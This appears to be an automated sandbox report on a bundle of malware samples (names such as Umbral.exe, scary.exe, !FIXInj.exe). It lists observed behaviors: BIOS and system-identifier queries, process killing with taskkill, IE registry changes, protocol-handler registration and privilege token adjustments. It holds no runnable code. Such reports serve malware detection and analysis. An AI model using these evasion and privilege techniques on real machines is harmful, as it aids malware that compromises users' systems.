Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29\IEFixedFontName = "Gadugi" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\18 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEFixedFontName = "Vani" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEFixedFontName = "Kokila" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19\IEFixedFontName = "Cordia New" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\32\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37\IEFixedFontName = "Leelawadee UI" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\39\IEPropFontName = "Mongolian Baiti" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7\IEFixedFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12\IEPropFontName = "Raavi" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6\IEFixedFontName = "Courier New" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8\IEFixedFontName = "Courier New" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEFixedFontName = "Iskoola Pota" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5\IEFixedFontName = "Courier New" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24\IEFixedFontName = "MS Gothic" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName = "Courier New" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24\IEPropFontName = "MS PGothic" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27\IEFixedFontName = "Ebrima" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13\IEPropFontName = "Shruti" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13\IEFixedFontName = "Shruti" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22\IEPropFontName = "Sylfaen" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28\IEFixedFontName = "Gadugi" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\9\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\21\IEFixedFontName = "Microsoft Himalaya" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12\IEFixedFontName = "Raavi" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20\IEFixedFontName = "Leelawadee UI" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33\IEFixedFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19\IEPropFontName = "Leelawadee UI" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25\IEPropFontName = "PMingLiu" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30\IEPropFontName = "Microsoft Yi Baiti" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31\IEFixedFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEPropFontName = "Iskoola Pota" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14\IEFixedFontName = "Kalinga" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\17\IEFixedFontName = "Tunga" C:\Windows\SysWOW64\reg.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\URL Protocol C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell\open C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\\bloatware\\3.exe\" -- \"%1\"" C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\ = "URL:psiphon" C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell\open\command C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A

Runs net.exe

Runs regedit.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\scary.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\SubDir\Romilyaa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\SubDir\Romilyaa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\SubDir\Romilyaa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\SubDir\Romilyaa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A

Suspicious use of FindShellTrayWindow

